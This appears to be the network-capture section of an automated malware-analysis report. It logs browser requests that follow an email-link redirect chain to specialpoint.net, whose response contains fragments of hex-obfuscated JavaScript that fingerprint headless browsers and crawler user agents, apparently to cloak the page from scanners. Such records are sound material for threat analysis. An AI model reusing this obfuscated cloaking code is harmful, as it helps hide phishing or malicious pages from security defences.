                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                9192.168.2.44981464.34.23.1834437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:02 UTC739OUTGET /s1/url.us.m.mimecastprotect.com/s/M5BmCkRO7zHg7kGZf23i6C?domain=d2e4wd34e3e HTTP/1.1
                                                                                                                                                                                                                                                                Host: redirect.aecdaily.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:02 UTC252INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:02 GMT
                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                Location: https://url.us.m.mimecastprotect.com/s/M5BmCkRO7zHg7kGZf23i6C?domain=d2e4wd34e3e
                                                                                                                                                                                                                                                                Content-Length: 264
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                2024-08-12 13:23:02 UTC264INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 72 6c 2e 75 73 2e 6d 2e 6d 69 6d 65 63 61 73 74 70 72 6f 74 65 63 74 2e 63 6f 6d 2f 73 2f 4d 35 42 6d 43 6b 52 4f 37 7a 48 67 37 6b 47 5a 66 32 33 69 36 43 3f 64 6f 6d 61 69 6e 3d 64 32 65 34 77 64 33 34 65 33 65 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79
                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://url.us.m.mimecastprotect.com/s/M5BmCkRO7zHg7kGZf23i6C?domain=d2e4wd34e3e">here</a>.</p></body


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                10192.168.2.449815207.211.31.1134437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:03 UTC714OUTGET /s/M5BmCkRO7zHg7kGZf23i6C?domain=d2e4wd34e3e HTTP/1.1
                                                                                                                                                                                                                                                                Host: url.us.m.mimecastprotect.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:03 UTC2413INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:03 GMT
                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Location: https://url.us.m.mimecastprotect.com/r/CAzbxzXu31luj1VP7l1qJ00_Lfa9N-92qS7YYGQxb2X6YN3eQw_zNwjneYru5HBU6SL2Hi7fsPA_vNHCMS7ShHe3S-OjTlpXELOr6CFNPyQBmF5CDDL9yZ4Y96M7ME3y63zc-a27ffhGf9MokvM4QsS20uxB2QmKH-bGUo8BgMAslyYsN3JERfH-cyEoV4KGgFEm-6pXQl3f9IKxRqhylB-hn4heSneIp9fyO4uA8iOOEFednAqCL2JXIKlyvymXUi3oo1nCVTD1PcEmYZq3LYd3ssMz3_Q_JK-sNgun-2Y-0G02lpszM2y4H4MgX_FyHGsGfwtpQx4g71lwOFTzhvVymcCGIxvN74X3d7tqx7YuS0O_pje6-FHKyFr74AikZqJ0u_5x-jEprLVXajzIDP2ZdNnwI7jfdbCEwyPctM4wjUCgFe0_bGMZ9DnOi0WMZxzw2GL3zX_2N8nuW6TEtUImkxe8Wmivg84Fj710qVb0_nBpXA_Jh6WgSaGqGwKXXoS6CNW3dWWDnhCuj4BP6JWYzgpiEf377I2H-fubIzY15fw2lBwFIZ6h13yh0wEzdG-ZfC7tH18VkhgGeOxXJI7h0C2QeO2zco1w44t9_lUjenZooeDLAJObxtijSIaWfVVVFILDAYpwhoiobjh3zTD0pmoQ0FgdNKNOa9DR8BjMCNbQrozxyidLn9hbo91_xr65xqvfau1zydbxyLkPVwrfIGyxRsKmvwuOIBMfnH0RWYKejDfAa4ec6Wir12ZPpbvWKNjk5o82Om2N6Ox5XyWIeeYjeOwaZW3gF3gGjKo5EeBxxOF9XmOc_R2IklQbJhXkxF7BQe8kTULWO8pnLmGmmexdn-LD8peE1yDbAWQddyYC8GdPL5ifkgqyoRLqlYIDkdYd_dQTow2ia8-_cDASB_yl6fs7McUCFsWglKJSVvc9Y2sHnxM4NA1GOGUOF0eIayqvRx03UTw [TRUNCATED]
                                                                                                                                                                                                                                                                Cache-control: no-store
                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                X-Robots-Tag: noindex, nofollow


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                11192.168.2.449816207.211.31.1134437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:04 UTC2849OUTGET /r/CAzbxzXu31luj1VP7l1qJ00_Lfa9N-92qS7YYGQxb2X6YN3eQw_zNwjneYru5HBU6SL2Hi7fsPA_vNHCMS7ShHe3S-OjTlpXELOr6CFNPyQBmF5CDDL9yZ4Y96M7ME3y63zc-a27ffhGf9MokvM4QsS20uxB2QmKH-bGUo8BgMAslyYsN3JERfH-cyEoV4KGgFEm-6pXQl3f9IKxRqhylB-hn4heSneIp9fyO4uA8iOOEFednAqCL2JXIKlyvymXUi3oo1nCVTD1PcEmYZq3LYd3ssMz3_Q_JK-sNgun-2Y-0G02lpszM2y4H4MgX_FyHGsGfwtpQx4g71lwOFTzhvVymcCGIxvN74X3d7tqx7YuS0O_pje6-FHKyFr74AikZqJ0u_5x-jEprLVXajzIDP2ZdNnwI7jfdbCEwyPctM4wjUCgFe0_bGMZ9DnOi0WMZxzw2GL3zX_2N8nuW6TEtUImkxe8Wmivg84Fj710qVb0_nBpXA_Jh6WgSaGqGwKXXoS6CNW3dWWDnhCuj4BP6JWYzgpiEf377I2H-fubIzY15fw2lBwFIZ6h13yh0wEzdG-ZfC7tH18VkhgGeOxXJI7h0C2QeO2zco1w44t9_lUjenZooeDLAJObxtijSIaWfVVVFILDAYpwhoiobjh3zTD0pmoQ0FgdNKNOa9DR8BjMCNbQrozxyidLn9hbo91_xr65xqvfau1zydbxyLkPVwrfIGyxRsKmvwuOIBMfnH0RWYKejDfAa4ec6Wir12ZPpbvWKNjk5o82Om2N6Ox5XyWIeeYjeOwaZW3gF3gGjKo5EeBxxOF9XmOc_R2IklQbJhXkxF7BQe8kTULWO8pnLmGmmexdn-LD8peE1yDbAWQddyYC8GdPL5ifkgqyoRLqlYIDkdYd_dQTow2ia8-_cDASB_yl6fs7McUCFsWglKJSVvc9Y2sHnxM4NA1GOGUOF0eIayqvRx03UTwkiLaGfquV79A1uS1bRlxLyZ08_xd_x5HiOmQR0z-gF [TRUNCATED]
                                                                                                                                                                                                                                                                Host: url.us.m.mimecastprotect.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:06 UTC512INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:06 GMT
                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Location: https://url6.mailanyone.net/scanner?m=1sJdcn-00066a-5L&d=4%7Cmail%2F90%2F1718735400%2F1sJdcn-00066a-5L%7Cin6o%7C57e1b682%7C9862810%7C9895322%7C6671D2A9D5E8CBE4BA7AD963BA80AE39&o=%2Fphtp%3A%2Fstsiaectponil%2Ften.&s=r8DnnBsR0-04oskybCA7E0lSzWQ
                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                Cache-control: no-store
                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                X-Robots-Tag: noindex, nofollow


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                12192.168.2.44981364.34.23.1834437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:12 UTC102INData Raw: 48 54 54 50 2f 31 2e 30 20 34 30 38 20 52 65 71 75 65 73 74 20 54 69 6d 65 2d 6f 75 74 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: HTTP/1.0 408 Request Time-outCache-Control: no-cacheConnection: closeContent-Type: text/html
                                                                                                                                                                                                                                                                2024-08-12 13:23:12 UTC110INData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 38 20 52 65 71 75 65 73 74 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 64 69 64 6e 27 74 20 73 65 6e 64 20 61 20 63 6f 6d 70 6c 65 74 65 20 72 65 71 75 65 73 74 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                Data Ascii: <html><body><h1>408 Request Time-out</h1>Your browser didn't send a complete request in time.</body></html>


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                13192.168.2.449845188.114.96.34437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:17 UTC684OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                Host: specialpoint.net
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                Referer: https://url6.mailanyone.net/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:18 UTC1369INHTTP/1.1 503 Service Temporarily Unavailable
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:18 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                Set-Cookie: 7kP2-qok0lQDSgS5QI_1bI1YJcI=FC4yW9_pqdYUTlZz8DToWRyTXJg; path=/; expires=Tue, 13-Aug-24 13:23:17 GMT; Max-Age=86400;
                                                                                                                                                                                                                                                                Set-Cookie: BfIXpQ8HLf2HlwQby-i5VYmY1UQ=1723468997; path=/; expires=Tue, 13-Aug-24 13:23:17 GMT; Max-Age=86400;
                                                                                                                                                                                                                                                                Set-Cookie: C0Pdmwq0diPL4zHheBbw87DvKQ0=1723555397; path=/; expires=Tue, 13-Aug-24 13:23:17 GMT; Max-Age=86400;
                                                                                                                                                                                                                                                                Set-Cookie: w1hY5oz7fIQPRVtBdM0Mqs-wkz8=apJT5sJ29sm__xnJuYb_3c5EIBc; path=/; expires=Tue, 13-Aug-24 13:23:17 GMT; Max-Age=86400;
                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                Cache-Control: public, max-age=0 no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                Expires: 0
                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KW3oVXcxkvcoRQ0j9z0gnf45ksoTwOh2Nq3ANLX6W2I709YOpnOYid8RDa8svUy8KahbG3kHYSFdiJ61qbAmvdEW7j%2BWyWNKZrGCmIhy0gZSRnbrMzyeeQri3kf8MfAT0J5l"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                CF-RAY: 8b20c7739b2319b2-EWR
                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:18 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                                2024-08-12 13:23:18 UTC1367INData Raw: 32 32 65 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d
                                                                                                                                                                                                                                                                Data Ascii: 22e7<!DOCTYPE html><html><head><meta charset="utf-8" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="viewport" content="width=device-width, initial-
                                                                                                                                                                                                                                                                2024-08-12 13:23:18 UTC1369INData Raw: 5c 78 36 33 5c 78 36 38 5c 78 34 35 5c 78 37 36 5c 78 36 35 5c 78 36 45 5c 78 37 34 5c 78 32 38 5c 78 32 32 5c 78 36 46 5c 78 36 45 5c 78 37 32 5c 78 36 35 5c 78 36 31 5c 78 36 34 5c 78 37 39 5c 78 37 33 5c 78 37 34 5c 78 36 31 5c 78 37 34 5c 78 36 35 5c 78 36 33 5c 78 36 38 5c 78 36 31 5c 78 36 45 5c 78 36 37 5c 78 36 35 5c 78 32 32 5c 78 32 43 5c 78 32 30 5c 78 36 32 5c 78 32 39 5c 78 37 44 5c 78 33 42 5c 78 30 41 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 36 32 5c 78 32 38 5c 78 36 36 5c 78 37 35 5c 78 36 45 5c 78 36 33 5c 78 37 34 5c 78 36 39 5c 78 36 46 5c 78 36 45 5c 78 32 38 5c 78 32 39 5c 78 37 42 5c 78 30 41 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32
                                                                                                                                                                                                                                                                Data Ascii: \x63\x68\x45\x76\x65\x6E\x74\x28\x22\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65\x22\x2C\x20\x62\x29\x7D\x3B\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x62\x28\x66\x75\x6E\x63\x74\x69\x6F\x6E\x28\x29\x7B\x0A\x20\x20\x20\x20\x20\x20\x2
                                                                                                                                                                                                                                                                2024-08-12 13:23:18 UTC1369INData Raw: 78 32 37 5c 78 33 42 5c 78 32 30 5c 78 36 35 5c 78 37 38 5c 78 37 30 5c 78 36 39 5c 78 37 32 5c 78 36 35 5c 78 37 33 5c 78 33 44 5c 78 32 37 5c 78 32 30 5c 78 32 42 5c 78 32 30 5c 78 32 37 5c 78 35 34 5c 78 37 35 5c 78 36 35 5c 78 32 43 5c 78 32 30 5c 78 33 31 5c 78 33 33 5c 78 32 44 5c 78 34 31 5c 78 37 35 5c 78 36 37 5c 78 32 44 5c 78 33 32 5c 78 33 34 5c 78 32 30 5c 78 33 31 5c 78 33 33 5c 78 33 41 5c 78 33 32 5c 78 33 33 5c 78 33 41 5c 78 33 31 5c 78 33 37 5c 78 32 30 5c 78 34 37 5c 78 34 44 5c 78 35 34 5c 78 32 37 5c 78 32 30 5c 78 32 42 5c 78 32 30 5c 78 32 37 5c 78 33 42 5c 78 32 30 5c 78 37 30 5c 78 36 31 5c 78 37 34 5c 78 36 38 5c 78 33 44 5c 78 32 46 5c 78 32 37 5c 78 33 42 5c 78 30 41 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30
                                                                                                                                                                                                                                                                Data Ascii: x27\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D\x27\x20\x2B\x20\x27\x54\x75\x65\x2C\x20\x31\x33\x2D\x41\x75\x67\x2D\x32\x34\x20\x31\x33\x3A\x32\x33\x3A\x31\x37\x20\x47\x4D\x54\x27\x20\x2B\x20\x27\x3B\x20\x70\x61\x74\x68\x3D\x2F\x27\x3B\x0A\x20\x20\x20\x20\x20
                                                                                                                                                                                                                                                                2024-08-12 13:23:18 UTC1369INData Raw: 32 46 5c 78 30 41 5c 78 36 39 5c 78 36 36 5c 78 32 38 5c 78 32 31 5c 78 37 37 5c 78 36 39 5c 78 36 45 5c 78 36 34 5c 78 36 46 5c 78 37 37 5c 78 32 45 5c 78 36 35 5c 78 36 44 5c 78 36 39 5c 78 37 34 5c 78 32 39 5c 78 37 42 5c 78 32 46 5c 78 32 41 5c 78 36 33 5c 78 36 46 5c 78 37 35 5c 78 36 33 5c 78 36 38 5c 78 36 41 5c 78 37 33 5c 78 32 41 5c 78 32 46 5c 78 30 41 5c 78 36 39 5c 78 36 36 5c 78 32 38 5c 78 32 31 5c 78 37 37 5c 78 36 39 5c 78 36 45 5c 78 36 34 5c 78 36 46 5c 78 37 37 5c 78 32 45 5c 78 37 33 5c 78 37 30 5c 78 36 31 5c 78 37 37 5c 78 36 45 5c 78 32 39 5c 78 37 42 5c 78 32 46 5c 78 32 41 5c 78 37 32 5c 78 36 38 5c 78 36 39 5c 78 36 45 5c 78 36 46 5c 78 32 41 5c 78 32 46 5c 78 30 41 5c 78 36 39 5c 78 36 36 5c 78 32 38 5c 78 32 31 5c 78 37 37 5c
                                                                                                                                                                                                                                                                Data Ascii: 2F\x0A\x69\x66\x28\x21\x77\x69\x6E\x64\x6F\x77\x2E\x65\x6D\x69\x74\x29\x7B\x2F\x2A\x63\x6F\x75\x63\x68\x6A\x73\x2A\x2F\x0A\x69\x66\x28\x21\x77\x69\x6E\x64\x6F\x77\x2E\x73\x70\x61\x77\x6E\x29\x7B\x2F\x2A\x72\x68\x69\x6E\x6F\x2A\x2F\x0A\x69\x66\x28\x21\x77\
                                                                                                                                                                                                                                                                2024-08-12 13:23:18 UTC1369INData Raw: 42 5c 78 37 43 5c 78 36 31 5c 78 36 43 5c 78 36 35 5c 78 37 38 5c 78 36 31 5c 78 37 43 5c 78 36 39 5c 78 36 31 5c 78 35 46 5c 78 36 31 5c 78 37 32 5c 78 36 33 5c 78 36 38 5c 78 36 39 5c 78 37 36 5c 78 36 35 5c 78 37 32 5c 78 37 43 5c 78 36 36 5c 78 36 31 5c 78 36 33 5c 78 36 35 5c 78 36 32 5c 78 36 46 5c 78 36 46 5c 78 36 42 5c 78 37 43 5c 78 37 34 5c 78 37 37 5c 78 36 39 5c 78 37 34 5c 78 37 34 5c 78 36 35 5c 78 37 32 5c 78 37 43 5c 78 36 43 5c 78 36 39 5c 78 36 45 5c 78 36 42 5c 78 36 35 5c 78 36 34 5c 78 36 39 5c 78 36 45 5c 78 37 43 5c 78 37 30 5c 78 36 39 5c 78 36 45 5c 78 36 37 5c 78 36 34 5c 78 36 46 5c 78 36 44 5c 78 32 46 5c 78 36 39 5c 78 32 45 5c 78 37 34 5c 78 36 35 5c 78 37 33 5c 78 37 34 5c 78 32 38 5c 78 36 45 5c 78 36 31 5c 78 37 36 5c 78
                                                                                                                                                                                                                                                                Data Ascii: B\x7C\x61\x6C\x65\x78\x61\x7C\x69\x61\x5F\x61\x72\x63\x68\x69\x76\x65\x72\x7C\x66\x61\x63\x65\x62\x6F\x6F\x6B\x7C\x74\x77\x69\x74\x74\x65\x72\x7C\x6C\x69\x6E\x6B\x65\x64\x69\x6E\x7C\x70\x69\x6E\x67\x64\x6F\x6D\x2F\x69\x2E\x74\x65\x73\x74\x28\x6E\x61\x76\x
                                                                                                                                                                                                                                                                2024-08-12 13:23:18 UTC1369INData Raw: 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 46 5c 78 32 41 5c 78 37 44 5c 78 32 41 5c 78 32 46 5c 78 30 41 5c 78 32 46 5c 78 32 41 5c 78 37 44 5c 78 32 41 5c 78 32 46 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 32 46 5c 78 32 41 5c 78 37 44 5c 78 32 41 5c 78 32 46 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32
                                                                                                                                                                                                                                                                Data Ascii: \x20\x20\x20\x20\x20\x20\x20\x2F\x2A\x7D\x2A\x2F\x0A\x2F\x2A\x7D\x2A\x2F\x0A\x7D\x0A\x2F\x2A\x7D\x2A\x2F\x0A\x7D\x0A\x7D\x0A\x7D\x0A\x7D\x0A\x7D\x0A\x7D\x0A\x7D\x0A\x7D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
